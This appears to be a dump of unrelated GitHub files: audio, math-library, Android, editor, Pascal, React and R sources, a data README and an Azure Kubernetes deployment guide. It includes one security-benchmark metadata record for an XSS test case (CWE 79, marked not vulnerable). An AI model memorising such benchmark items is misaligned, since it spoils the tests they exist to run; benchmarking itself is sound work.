coefs[2] * 1.1 => coefs[2];
coefs[4] * 1.1 => coefs[4];
coefs[6] * 1.1 => coefs[6];
coefs => gen17.coefs;
}
fun void lessOdds()
{
coefs[0] * 0.8 => coefs[0];
coefs[2] * 0.8 => coefs[2];
coefs[4] * 0.8 => coefs[4];
coefs[6] * 0.8 => coefs[6];
coefs => gen17.coefs;
}
}
BlueBox3 blueBox;
0.33 => blueBox.mix;
adc => blueBox => dac;
for (0 => int i; i < 8; i++)
{
0.8 + i * 0.1 => float gain;
gain => blueBox.gen17.gain;
<<<"gain", gain>>>;
1::minute => now;
}
<<<"done">>>;
| {
"pile_set_name": "Github"
} |
<test-metadata>
<benchmark-version>1.2</benchmark-version>
<category>xss</category>
<test-number>01054</test-number>
<vulnerability>false</vulnerability>
<cwe>79</cwe>
</test-metadata>
| {
"pile_set_name": "Github"
} |
/* Nehalem gmp-mparam.h -- Compiler/machine parameter header file.
Copyright 1991, 1993, 1994, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007,
2008, 2009, 2010, 2011, 2012 Free Software Foundation, Inc.
This file is part of the GNU MP Library.
The GNU MP Library is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
The GNU MP Library is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
License for more details.
You should have received a copy of the GNU Lesser General Public License
along with the GNU MP Library. If not, see http://www.gnu.org/licenses/. */
#define GMP_LIMB_BITS 64
#define BYTES_PER_MP_LIMB 8
/* 2667 MHz Core i7 Nehalem */
#define MOD_1_NORM_THRESHOLD 0 /* always */
#define MOD_1_UNNORM_THRESHOLD 0 /* always */
#define MOD_1N_TO_MOD_1_1_THRESHOLD 3
#define MOD_1U_TO_MOD_1_1_THRESHOLD 3
#define MOD_1_1_TO_MOD_1_2_THRESHOLD 11
#define MOD_1_2_TO_MOD_1_4_THRESHOLD 16
#define PREINV_MOD_1_TO_MOD_1_THRESHOLD 9
#define USE_PREINV_DIVREM_1 1 /* native */
#define DIV_QR_2_PI2_THRESHOLD MP_SIZE_T_MAX /* never */
#define DIVEXACT_1_THRESHOLD 0 /* always (native) */
#define BMOD_1_TO_MOD_1_THRESHOLD 16
#define MUL_TOOM22_THRESHOLD 18
#define MUL_TOOM33_THRESHOLD 57
#define MUL_TOOM44_THRESHOLD 169
#define MUL_TOOM6H_THRESHOLD 222
#define MUL_TOOM8H_THRESHOLD 288
#define MUL_TOOM32_TO_TOOM43_THRESHOLD 65
#define MUL_TOOM32_TO_TOOM53_THRESHOLD 108
#define MUL_TOOM42_TO_TOOM53_THRESHOLD 99
#define MUL_TOOM42_TO_TOOM63_THRESHOLD 105
#define MUL_TOOM43_TO_TOOM54_THRESHOLD 82
#define SQR_BASECASE_THRESHOLD 0 /* always (native) */
#define SQR_TOOM2_THRESHOLD 30
#define SQR_TOOM3_THRESHOLD 101
#define SQR_TOOM4_THRESHOLD 250
#define SQR_TOOM6_THRESHOLD 306
#define SQR_TOOM8_THRESHOLD 454
#define MULMID_TOOM42_THRESHOLD 22
#define MULMOD_BNM1_THRESHOLD 11
#define SQRMOD_BNM1_THRESHOLD 13
#define MUL_FFT_MODF_THRESHOLD 380 /* k = 5 */
#define MUL_FFT_TABLE3 \
{ { 380, 5}, { 17, 6}, { 9, 5}, { 19, 6}, \
{ 10, 5}, { 21, 6}, { 11, 5}, { 23, 6}, \
{ 21, 7}, { 11, 6}, { 23, 7}, { 21, 8}, \
{ 11, 7}, { 24, 8}, { 13, 7}, { 27, 8}, \
{ 15, 7}, { 31, 8}, { 21, 9}, { 11, 8}, \
{ 27, 9}, { 15, 8}, { 33, 9}, { 19, 8}, \
{ 39, 9}, { 23, 8}, { 47, 9}, { 27,10}, \
{ 15, 9}, { 39,10}, { 23, 9}, { 47,11}, \
{ 15,10}, { 31, 9}, { 67,10}, { 39, 9}, \
{ 79,10}, { 47, 9}, { 95,10}, { 55,11}, \
{ 31,10}, { 79,11}, { 47,10}, { 95,12}, \
{ 31,11}, { 63,10}, { 135,11}, { 79,10}, \
{ 159,11}, { 95,10}, { 191, 9}, { 383,12}, \
{ 63,11}, { 127,10}, { 255, 9}, { 511,11}, \
{ 143,10}, { 287, 9}, { 575,10}, { 303,11}, \
{ 159,10}, { 319,12}, { 95,11}, { 191,10}, \
{ 383,11}, { 207,13}, { 63,12}, { 127,11}, \
{ 255,10}, { 511,11}, { 271,10}, { 543,11}, \
{ 287,10}, { 575,11}, { 303,12}, { 159,11}, \
{ 319,10}, { 639,11}, { 351,10}, { 703,12}, \
{ 191,11}, { 383,10}, { 767,11}, { 415,10}, \
{ 831,12}, { 223,11}, { 447,10}, { 895,13}, \
{ 127,12}, { 255,11}, { 511,10}, { 1023,11}, \
{ 543,12}, { 287,11}, { 607,12}, { 319,11}, \
{ 639,12}, { 351,11}, { 703,10}, { 1407,13}, \
{ 191,12}, { 383,11}, { 767,12}, { 415,11}, \
{ 831,10}, { 1663,12}, { 447,11}, { 895,12}, \
{ 479,14}, { 127,13}, { 255,12}, { 511,11}, \
{ 1023,12}, { 543,11}, { 1087,12}, { 575,11}, \
{ 1151,12}, { 607,13}, { 319,12}, { 703,11}, \
{ 1407,13}, { 383,12}, { 831,11}, { 1663,13}, \
{ 447,12}, { 959,11}, { 1919,14}, { 16384,15}, \
{ 32768,16}, { 65536,17}, { 131072,18}, { 262144,19}, \
{ 524288,20}, {1048576,21}, {2097152,22}, {4194304,23}, \
{8388608,24} }
#define MUL_FFT_TABLE3_SIZE 137
#define MUL_FFT_THRESHOLD 3712
#define SQR_FFT_MODF_THRESHOLD 304 /* k = 5 */
#define SQR_FFT_TABLE3 \
{ { 304, 5}, { 17, 6}, { 9, 5}, { 19, 6}, \
{ 21, 7}, { 11, 6}, { 23, 7}, { 21, 8}, \
{ 11, 7}, { 24, 8}, { 13, 7}, { 27, 8}, \
{ 15, 7}, { 31, 8}, { 21, 9}, { 11, 8}, \
{ 27, 9}, { 15, 8}, { 33, 9}, { 19, 8}, \
{ 41, 9}, { 23, 8}, { 47, 9}, { 27,10}, \
{ 15, 9}, { 39,10}, { 23, 9}, { 47,11}, \
{ 15,10}, { 31, 9}, { 67,10}, { 39, 9}, \
{ 79,10}, { 47,11}, { 31,10}, { 79,11}, \
{ 47,12}, { 31,11}, { 63,10}, { 127, 9}, \
{ 255,11}, { 79,10}, { 159, 9}, { 319,11}, \
{ 95,10}, { 191, 9}, { 383,12}, { 63,11}, \
{ 127,10}, { 255, 9}, { 511,10}, { 271, 9}, \
{ 543,11}, { 143,10}, { 287, 9}, { 575,11}, \
{ 159,10}, { 319,11}, { 175,12}, { 95,11}, \
{ 191,10}, { 383,11}, { 207,13}, { 63,12}, \
{ 127,11}, { 255,10}, { 511,11}, { 271,10}, \
{ 543,11}, { 287,10}, { 575,12}, { 159,11}, \
{ 319,10}, { 639,11}, { 351,10}, { 703,12}, \
{ 191,11}, { 383,10}, { 767,11}, { 415,10}, \
{ 831,12}, { 223,11}, { 447,10}, { 895,11}, \
{ 479,13}, { 127,12}, { 255,11}, { 511,10}, \
{ 1023,11}, { 543,12}, { 287,11}, { 575,10}, \
{ 1151,12}, { 319,11}, { 639,12}, { 351,11}, \
{ 703,13}, { 191,12}, { 383,11}, { 767,12}, \
{ 415,11}, { 831,12}, { 447,11}, { 895,12}, \
{ 479,11}, { 959,14}, { 127,13}, { 255,12}, \
{ 511,11}, { 1023,12}, { 543,11}, { 1087,12}, \
{ 575,11}, { 1151,12}, { 607,13}, { 319,12}, \
{ 639,11}, { 1279,12}, { 703,11}, { 1407,13}, \
{ 383,12}, { 767,11}, { 1535,12}, { 831,13}, \
{ 447,12}, { 959,11}, { 1919,14}, { 16384,15}, \
{ 32768,16}, { 65536,17}, { 131072,18}, { 262144,19}, \
{ 524288,20}, {1048576,21}, {2097152,22}, {4194304,23}, \
{8388608,24} }
#define SQR_FFT_TABLE3_SIZE 137
#define SQR_FFT_THRESHOLD 3200
#define MULLO_BASECASE_THRESHOLD 0 /* always */
#define MULLO_DC_THRESHOLD 45
#define MULLO_MUL_N_THRESHOLD 6633
#define DC_DIV_QR_THRESHOLD 38
#define DC_DIVAPPR_Q_THRESHOLD 123
#define DC_BDIV_QR_THRESHOLD 36
#define DC_BDIV_Q_THRESHOLD 26
#define INV_MULMOD_BNM1_THRESHOLD 35
#define INV_NEWTON_THRESHOLD 163
#define INV_APPR_THRESHOLD 147
#define BINV_NEWTON_THRESHOLD 230
#define REDC_1_TO_REDC_2_THRESHOLD 10
#define REDC_2_TO_REDC_N_THRESHOLD 54
#define MU_DIV_QR_THRESHOLD 1187
#define MU_DIVAPPR_Q_THRESHOLD 1187
#define MUPI_DIV_QR_THRESHOLD 75
#define MU_BDIV_QR_THRESHOLD 1078
#define MU_BDIV_Q_THRESHOLD 1142
#define POWM_SEC_TABLE 2,65,322,1036,2699
#define MATRIX22_STRASSEN_THRESHOLD 16
#define HGCD_THRESHOLD 142
#define HGCD_APPR_THRESHOLD 177
#define HGCD_REDUCE_THRESHOLD 2121
#define GCD_DC_THRESHOLD 345
#define GCDEXT_DC_THRESHOLD 372
#define JACOBI_BASE_METHOD 4
#define GET_STR_DC_THRESHOLD 12
#define GET_STR_PRECOMPUTE_THRESHOLD 20
#define SET_STR_DC_THRESHOLD 378
#define SET_STR_PRECOMPUTE_THRESHOLD 1585
#define FAC_DSC_THRESHOLD 351
#define FAC_ODD_THRESHOLD 43
| {
"pile_set_name": "Github"
} |
<?xml version='1.0' encoding='UTF-8'?>
<resources>
<string name="cant_call">Nu pot apela</string>
<string name="rewrite">Rescriere</string>
<string name="stop_processing">Opreste procesarea</string>
<string name="direct_call">Apeleaza direct</string>
<string name="auto_answer">Raspuns automat</string>
<string name="starts_with">Incepe cu</string>
<string name="ends_with">Se termina cu</string>
<string name="contains">Conține</string>
<string name="has_exactly_n_digits">Are exact N poziții</string>
<string name="has_more_than_n_digits">Are mai mult de N poziții</string>
<string name="is_exactly">Este fix</string>
<string name="custom_regexp">Expresie regulata personalizata</string>
<string name="replace_match_by">Inlocuieste cu</string>
<string name="replace_all_by">Inlocuieste tot cu</string>
</resources>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!--
~ This file is part of the PhotoEditor Software Development Kit.
~
~ Copyright (C) 2019 img.ly GmbH <[email protected]>
~ All rights reserved.
~
~ Redistribution and use in source and binary forms, without
~ modification, are permitted provided that the following license agreement
~ is approved and a legal/financial contract was signed by the user.
~
~ The license agreement can be found under the following link:
~
~ https://www.photoeditorsdk.com/LICENSE.txt
-->
<selector xmlns:android="http://schemas.android.com/apk/res/android">
<item android:state_selected="true"
android:color="@color/imgly_icon_color_active"/>
<item android:color="@color/imgly_icon_color"/>
</selector> | {
"pile_set_name": "Github"
} |
Motoya L Cider W3 and L Mulberry W3 TrueType fonts from Android.
| {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2003-2014, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang( 'toolbar', 'en-au', {
toolbarCollapse: 'Collapse Toolbar', // MISSING
toolbarExpand: 'Expand Toolbar', // MISSING
toolbarGroups: {
document: 'Document',
clipboard: 'Clipboard/Undo',
editing: 'Editing',
forms: 'Forms',
basicstyles: 'Basic Styles',
paragraph: 'Paragraph',
links: 'Links',
insert: 'Insert',
styles: 'Styles',
colors: 'Colors',
tools: 'Tools'
},
toolbars: 'Editor toolbars'
} );
| {
"pile_set_name": "Github"
} |
{$IFDEF OGC_INTERFACE}
{$ifdef _LANGUAGE_ASSEMBLY}
(* Condition Register Bit Fields *)
const
cr0 = 0;
cr1 = 1;
cr2 = 2;
cr3 = 3;
cr4 = 4;
cr5 = 5;
cr6 = 6;
cr7 = 7;
(* General Purpose Registers (GPRs) *)
r0 = 0;
r1 = 1;
sp = 1;
r2 = 2;
toc = 2;
r3 = 3;
r4 = 4;
r5 = 5;
r6 = 6;
r7 = 7;
r8 = 8;
r9 = 9;
r10 = 10;
r11 = 11;
r12 = 12;
r13 = 13;
r14 = 14;
r15 = 15;
r16 = 16;
r17 = 17;
r18 = 18;
r19 = 19;
r20 = 20;
r21 = 21;
r22 = 22;
r23 = 23;
r24 = 24;
r25 = 25;
r26 = 26;
r27 = 27;
r28 = 28;
r29 = 29;
r30 = 30;
r31 = 31;
(* Floating Point Registers (FPRs) *)
fr0 = 0;
fr1 = 1;
fr2 = 2;
fr3 = 3;
fr4 = 4;
fr5 = 5;
fr6 = 6;
fr7 = 7;
fr8 = 8;
fr9 = 9;
fr10 = 10;
fr11 = 11;
fr12 = 12;
fr13 = 13;
fr14 = 14;
fr15 = 15;
fr16 = 16;
fr17 = 17;
fr18 = 18;
fr19 = 19;
fr20 = 20;
fr21 = 21;
fr22 = 22;
fr23 = 23;
fr24 = 24;
fr25 = 25;
fr26 = 26;
fr27 = 27;
fr28 = 28;
fr29 = 29;
fr30 = 30;
fr31 = 31;
vr0 = 0;
vr1 = 1;
vr2 = 2;
vr3 = 3;
vr4 = 4;
vr5 = 5;
vr6 = 6;
vr7 = 7;
vr8 = 8;
vr9 = 9;
vr10 = 10;
vr11 = 11;
vr12 = 12;
vr13 = 13;
vr14 = 14;
vr15 = 15;
vr16 = 16;
vr17 = 17;
vr18 = 18;
vr19 = 19;
vr20 = 20;
vr21 = 21;
vr22 = 22;
vr23 = 23;
vr24 = 24;
vr25 = 25;
vr26 = 26;
vr27 = 27;
vr28 = 28;
vr29 = 29;
vr30 = 30;
vr31 = 31;
{$endif _LANGUAGE_ASSEMBLY}
const
SPRG0 = 272;
SPRG1 = 273;
SPRG2 = 274;
SPRG3 = 275;
PMC1 = 953;
PMC2 = 954;
PMC3 = 957;
PMC4 = 958;
MMCR0 = 952;
MMCR1 = 956;
LINK_REGISTER_CALLEE_UPDATE_ROOM = 4;
EXCEPTION_NUMBER = 8;
SRR0_OFFSET = 12;
SRR1_OFFSET = 16;
GPR0_OFFSET = 20;
GPR1_OFFSET = 24;
GPR2_OFFSET = 28;
GPR3_OFFSET = 32;
GPR4_OFFSET = 36;
GPR5_OFFSET = 40;
GPR6_OFFSET = 44;
GPR7_OFFSET = 48;
GPR8_OFFSET = 52;
GPR9_OFFSET = 56;
GPR10_OFFSET = 60;
GPR11_OFFSET = 64;
GPR12_OFFSET = 68;
GPR13_OFFSET = 72;
GPR14_OFFSET = 76;
GPR15_OFFSET = 80;
GPR16_OFFSET = 84;
GPR17_OFFSET = 88;
GPR18_OFFSET = 92;
GPR19_OFFSET = 96;
GPR20_OFFSET = 100;
GPR21_OFFSET = 104;
GPR22_OFFSET = 108;
GPR23_OFFSET = 112;
GPR24_OFFSET = 116;
GPR25_OFFSET = 120;
GPR26_OFFSET = 124;
GPR27_OFFSET = 128;
GPR28_OFFSET = 132;
GPR29_OFFSET = 136;
GPR30_OFFSET = 140;
GPR31_OFFSET = 144;
GQR0_OFFSET = 148;
GQR1_OFFSET = 152;
GQR2_OFFSET = 156;
GQR3_OFFSET = 160;
GQR4_OFFSET = 164;
GQR5_OFFSET = 168;
GQR6_OFFSET = 172;
GQR7_OFFSET = 176;
CR_OFFSET = 180;
LR_OFFSET = 184;
CTR_OFFSET = 188;
XER_OFFSET = 192;
MSR_OFFSET = 196;
DAR_OFFSET = 200;
STATE_OFFSET = 204;
MODE_OFFSET = 206;
FPR0_OFFSET = 208;
FPR1_OFFSET = 216;
FPR2_OFFSET = 224;
FPR3_OFFSET = 232;
FPR4_OFFSET = 240;
FPR5_OFFSET = 248;
FPR6_OFFSET = 256;
FPR7_OFFSET = 264;
FPR8_OFFSET = 272;
FPR9_OFFSET = 280;
FPR10_OFFSET = 288;
FPR11_OFFSET = 296;
FPR12_OFFSET = 304;
FPR13_OFFSET = 312;
FPR14_OFFSET = 320;
FPR15_OFFSET = 328;
FPR16_OFFSET = 336;
FPR17_OFFSET = 344;
FPR18_OFFSET = 352;
FPR19_OFFSET = 360;
FPR20_OFFSET = 368;
FPR21_OFFSET = 376;
FPR22_OFFSET = 384;
FPR23_OFFSET = 392;
FPR24_OFFSET = 400;
FPR25_OFFSET = 408;
FPR26_OFFSET = 416;
FPR27_OFFSET = 424;
FPR28_OFFSET = 432;
FPR29_OFFSET = 440;
FPR30_OFFSET = 448;
FPR31_OFFSET = 456;
FPSCR_OFFSET = 464;
PSR0_OFFSET = 472;
PSR1_OFFSET = 480;
PSR2_OFFSET = 488;
PSR3_OFFSET = 496;
PSR4_OFFSET = 504;
PSR5_OFFSET = 512;
PSR6_OFFSET = 520;
PSR7_OFFSET = 528;
PSR8_OFFSET = 536;
PSR9_OFFSET = 544;
PSR10_OFFSET = 552;
PSR11_OFFSET = 560;
PSR12_OFFSET = 568;
PSR13_OFFSET = 576;
PSR14_OFFSET = 584;
PSR15_OFFSET = 592;
PSR16_OFFSET = 600;
PSR17_OFFSET = 608;
PSR18_OFFSET = 616;
PSR19_OFFSET = 624;
PSR20_OFFSET = 632;
PSR21_OFFSET = 640;
PSR22_OFFSET = 648;
PSR23_OFFSET = 656;
PSR24_OFFSET = 664;
PSR25_OFFSET = 672;
PSR26_OFFSET = 680;
PSR27_OFFSET = 688;
PSR28_OFFSET = 696;
PSR29_OFFSET = 704;
PSR30_OFFSET = 712;
PSR31_OFFSET = 720;
(*
* maintain the EABI requested 8 bytes aligment
* As SVR4 ABI requires 16, make it 16 (as some
* exception may need more registers to be processed...)
*)
EXCEPTION_FRAME_END = 728;
IBAT0U = 528;
IBAT0L = 529;
IBAT1U = 530;
IBAT1L = 531;
IBAT2U = 532;
IBAT2L = 533;
IBAT3U = 534;
IBAT3L = 535;
IBAT4U = 560;
IBAT4L = 561;
IBAT5U = 562;
IBAT5L = 563;
IBAT6U = 564;
IBAT6L = 565;
IBAT7U = 566;
IBAT7L = 567;
DBAT0U = 536;
DBAT0L = 537;
DBAT1U = 538;
DBAT1L = 539;
DBAT2U = 540;
DBAT2L = 541;
DBAT3U = 542;
DBAT3L = 543;
DBAT4U = 568;
DBAT4L = 569;
DBAT5U = 570;
DBAT5L = 571;
DBAT6U = 572;
DBAT6L = 573;
DBAT7U = 574;
DBAT7L = 575;
HID0 = 1008;
HID1 = 1009;
HID2 = 920;
HID4 = 1011;
GQR0 = 912;
GQR1 = 913;
GQR2 = 914;
GQR3 = 915;
GQR4 = 916;
GQR5 = 917;
GQR6 = 918;
GQR7 = 919;
L2CR = 1017;
WPAR = 921;
DMAU = 922;
DMAL = 923;
MSR_RI = $00000002;
MSR_DR = $00000010;
MSR_IR = $00000020;
MSR_IP = $00000040;
MSR_SE = $00000400;
MSR_ME = $00001000;
MSR_FP = $00002000;
MSR_POW = $00004000;
MSR_EE = $00008000;
PPC_ALIGNMENT = 8;
PPC_CACHE_ALIGNMENT = 32;
{$ENDIF OGC_INTERFACE}
| {
"pile_set_name": "Github"
} |
import React from 'react'
import PropTypes from 'prop-types'
const Picker = ({ value, onChange, options }) => (
<span>
<h1>{value}</h1>
<select onChange={e => onChange(e.target.value)}
value={value}>
{options.map(option =>
<option value={option} key={option}>
{option}
</option>)
}
</select>
</span>
)
Picker.propTypes = {
options: PropTypes.arrayOf(
PropTypes.string.isRequired
).isRequired,
value: PropTypes.string.isRequired,
onChange: PropTypes.func.isRequired
}
export default Picker
| {
"pile_set_name": "Github"
} |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/direction.R
\name{direction}
\alias{direction}
\title{Directions from data cells to headers}
\description{
How to use functions with a \code{direction} parameter.
Data cells relate to header cells by their proximity in a given direction.
The point of view is always \emph{from} the data cell \emph{to} the header. For
example, the direction \code{"up"} means "from each data cell go directly up to a
cell at the edge of the table, which is the header cell."
Scroll down to the "Tables" section for a visual explanation.
Legacy directions \code{"N"}, \verb{"NNW", }"W"\verb{, }"WNW"`, etc. are still supported.
Scroll down to the "Legacy directions" section for how they map to the new
directions.
\itemize{
\item \code{"up"} means from each data cell go directly up to a cell at the edge of
the the table, which is the header cell.
\item \code{"up-left"} means from each data cell go directly up to a cell at the edge
of the the table, then if the cell is blank go left until a cell that has a
value, which is the header cell.
\item \code{"up-right"} means from each data cell go directly up to a cell at the edge
of the the table, then if the cell is blank go right until a cell that has a
value, which is the header cell.
\item \code{"left"} means from each data cell go directly left to a cell at the edge
of the the table, which is the header cell.
\item \code{"left-up"} means from each data cell go directly left to a cell at the
edge of the the table, then if the cell is blank go up until a cell that has
a value, which is the header cell.
\item \code{"left-down"} means from each data cell go directly left to a cell at the
edge of the the table, then if the cell is blank go down until a cell that
has a value, which is the header cell.
\item \code{"right"} means from each data cell go directly right to a cell at the edge
of the the table, which is the header cell.
\item \code{"right-up"} means from each data cell go directly right to a cell at the
edge of the the table, then if the cell is blank go up until a cell that has
a value, which is the header cell.
\item \code{"right-down"} means from each data cell go directly right to a cell at the
edge of the the table, then if the cell is blank go down until a cell that
has a value, which is the header cell.
\item \code{"down"} means from each data cell go directly down to a cell at the edge
of the the table, which is the header cell.
\item \code{"down-left"} means from each data cell go directly down to a cell at the
edge of the the table, then if the cell is blank go left until a cell that
has a value, which is the header cell.
\item \code{"down-right"} means from each data cell go directly down to a cell at the
edge of the the table, then if the cell is blank go right until a cell that
has a value, which is the header cell.
}
}
\section{-ish}{
The difference between \code{"up"} and \code{"up-ish"} (and similar pairs of directions)
is that \code{"up"} finds headers directly above the data cell, whereas \code{"up-ish"}
matches the nearest header, whether above-left, above-right or directly above
the data cell. This is useful for matching headers that are not aligned to
the edge of the data cells that they refer to. There can be a tie in the
directions \code{"up-ish"}, \code{"down-ish"}, \code{"left-ish"} and \code{"right-ish"} , causing
\code{NA}s to be returned in the place of header values. Avoid ties by using
\code{\link[=justify]{justify()}} first to align header cells to the corner of the data cells they
describe.
\itemize{
\item \code{"up-ish"} means the closest cell at the top edge of the table without
crossing a border defined by the \code{border} parameter.
\item \code{"left-ish"} means the closest cell at the left-hand edge of the table
without crossing a border defined by the \code{border} parameter.
\item \code{"right-ish"} means the closest cell at the right-hand edge of the table
without crossing a border defined by the \code{border} parameter.
\item \code{"down-ish"} means the closest cell at the bottom edge of the table without
crossing a border defined by the \code{border} parameter.
}
}
\section{Tables}{
\preformatted{+----------------+-------------+-------------+
| | up-left | up-left |
+ +-------------+-------------+
| | up | up | up | up |
+----------------+------+------+------+------+
| left-up | left | data | data | data | data |
+ +------+------+------+------+------+
| | left | data | data | data | data |
+---------+------+------+------+------+------+
| left-up | left | data | data | data | data |
+ +------+------+------+------+------+
| | left | data | data | data | data |
+---------+------+------+------+------+------+
}\preformatted{+-------------+-------------+------------------+
| up-right | up-right | |
+-------------+-------------+ +
| up | up | up | up | |
+------+------+------+------+------------------+
| data | data | data | data | right | right-up |
+------+------+------+------+-------+ +
| data | data | data | data | right | |
+------+------+------+------+-------+----------+
| data | data | data | data | right | right-up |
+------+------+------+------+-------+ +
| data | data | data | data | right | |
+------+------+------+------+-------+----------+
}\preformatted{+-----------+------+------+------+------+------+
| | left | data | data | data | data |
+ +------+------+------+------+------+
| left-down | left | data | data | data | data |
+-----------+------+------+------+------+------+
| | left | data | data | data | data |
+ +------+------+------+------+------+
| left-down | left | data | data | data | data |
+-----------+------+------+------+------+------+
| | down | down | down | down |
+ +------+------+------+------+
| | down-left | down-left |
+-----------+------+-------------+-------------+
}\preformatted{'+------+------+------+------+-------+------------+
| data | data | data | data | right | |
+------+------+------+------+-------+ +
| data | data | data | data | right | right-down |
+------+------+------+------+-------+------------+
| data | data | data | data | right | |
+------+------+------+------+-------+ +
| data | data | data | data | right | right-down |
+------+------+------+------+-------+------------+
| down | down | down | down | |
+------+------+------+------+ +
| down-right | down-right | |
+-------------+-------------+--------------------+
}\preformatted{+-----------------+----------------------+-----------------------------+
| | up-ish | up-ish |
+ +----------------------+-----------------------------+
| | up | up | up | up | up | up | up |
+-----------------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| left-ish | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+----------+------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| left-ish | left | data | data | data | data | data | data | data |
+ +------+------+--------+------+------+------+--------+------+
| | left | data | data | data | data | data | data | data |
+----------+------+------+--------+------+------+------+----- -+------+
}\preformatted{+------+----------+------+------+------+----------+------+-------+-----------+
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | right-ish |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+-----------+
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | right-ish |
+------+----------+------+------+------+----------+------+-------+ +
| data | data | data | data | data | data | data | right | |
+------+----------+------+------+------+----------+------+-------+-----------+
| down | down | down | down | down | down | down | |
+------+----------+------+------+------+----------+------+ +
| down-ish | down-ish | |
+------------------------+-------------------------------+-------------------+
}
}
\section{Legacy directions}{
Older versions of unpivotr used different names for the directions, based on
the points of the compass. These are still supported but are discouraged.\preformatted{| old direction | new direction |
|---------------|---------------|
| N | up |
| NNW | up-left |
| NNE | up-right |
| W | left |
| WNW | left-up |
| WSW | left-down |
| E | right |
| ENE | right-up |
| ESE | right-down |
| S | down |
| SSW | down-left |
| SSE | down-right |
}
}
| {
"pile_set_name": "Github"
} |
# Tarantino
This folder contains data behind the story [A Complete Catalog Of Every Time Someone Cursed Or Bled Out In A Quentin Tarantino Movie](http://fivethirtyeight.com/features/complete-catalog-curses-deaths-quentin-tarantino-films).
Header | Definition
---|---------
`movie` | Film title
`type` | Whether the event was a profane word or a death
`word` | The specific profane word, if the event was a word
`minutes_in` | The number of minutes into the film the event occurred
Source: Author’s tally | {
"pile_set_name": "Github"
} |
# Managing backend with Azure Kubernetes Service (AKS)
## Key Takeaway
There are 2 features for the developers and operations team to consider as key takeaways from this demo:
1. **Introduction to AKS** - Azure Kubernetes Service (AKS) allows you to managed Kubernetes based orchestration service. It provides auto-patching, auto-scaling and updates support which enables you to use the full breadth of the Kubernetes ecosystem. In this demo you will learn how you can deploy containers in AKS by creating the cluster, deploy the services and managing the resources in Azure.
1. **Azure Dev Spaces** - Azure Dev Spaces allows you to test and iteratively develop your entire microservices application running in Azure Kubernetes Service (AKS) without the need to replicate or mock dependencies. Azure Dev Spaces reduces the burden and complexity of collaborating with your team in a shared Azure Kubernetes Service (AKS) cluster as well as running and debugging containers directly in AKS.
1. **Virtual Nodes** - A first-of-its-kind serverless computing option with AKS enables you to provision and scale your Kubernetes based apps more efficiently. Virtual Node enables you to elastically provision additional nodes inside your Kubernetes clusters in just seconds. This gives you the flexibility and the portability of containers while also ensuring that you pay only for the compute resources that you need and use.
# Before you begin
Pre-requisites for this deployment:
- Download or clone the code repository [Tailwind Traders Backend](https://github.com/Microsoft/TailwindTraders-Backend)
- A terminal with
- Bash environment with [jq](https://stedolan.github.io/jq/) installed **-OR-**
- Powershell environment
- [Azure CLI 2.0](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) installed.
- [Kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) installed.
- Docker installed
**Note**: The easiest way to have a working Bash environment on Windows is [enabling the WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and installing a Linux distro from the Windows Store.
Let us explore Azure Kubernetes Service to demonstrate how you will be able to take advantage of Kubernetes on Azure to deploy containers and save money using our new Virtual Node service for scaling
## Walkthrough: Deploying the backend services
1. Creating the **Azure Resources**
A PowerShell script is provided in the path `TailwindTraders-Backend/Deploy/powershell/Deploy-Arm-Azure.ps1` which needs to be executed to create resources required for the lab scenario.
Open PowerShell in **Administrator** mode, navigate to the local path where **Tailwind Traders Backend** repo has been cloned and execute the script below -
```
.\Deploy-Arm-Azure.ps1
```
Provide a non-existent **Resource Group** name, valid **Location** as input parameters.
Make a note of the output details of **Service Principal**, **Db Admin** and **Db Password** since it is required in the further exercises.
1. Connecting **kubectl to AKS**
From the terminal type:
- `az aks get-credentials -n <your-aks-name> -g <resource-group-name>` to download the configuration files that `kubectl` needs to connect to your AKS.
At this point if you type `kubectl config current-context` the name of your AKS cluster should be displayed. That means that `kubectl` is ready to use your AKS.

1. Installing **Tiller on AKS**
Helm is a tool to deploy resources in a Kubernetes cluster in a clean and simple manner. It is composed of two tools, one client-side (the Helm client) that needs to be installed on your machine, and a server component called _Tiller_ that must be installed on the Kubernetes cluster.
To install Helm, refer to its [installation page](https://docs.helm.sh/using_helm/#installing-helm). Once Helm is installed, _Tiller_ must be deployed on the cluster. For deploying _Tiller_, navigate to the `/Deploy` under TailwindTraders-Backend repository and run the `add-tiller.sh` (from Bash) or the `Add-Tiller.ps1` (from `/Deploy/powershell`).
Once installed, helm commands like `helm ls` should work without any error.
If you face an error - "Error: could not find a ready tiller pod", then run **helm init --upgrade** to upgrade tiller and execute the `helm ls` command again.
1. Configuring **services** with auto generation of \_gvalues file
Before deploying services using Helm, you need to setup the configuration by editing the file `helm/gvalues.yaml` and put the secrets, connection strings and all the configuration.
Generating a valid _gvalues_ file can be a bit harder, so there is a PowerShell script that can do all work by you. This script assumes that all resources are deployed in the same resource group, and this resource group contains only the Tailwind Traders resources. Also assumes the Azure resources have been created using the tools provided in this repo.
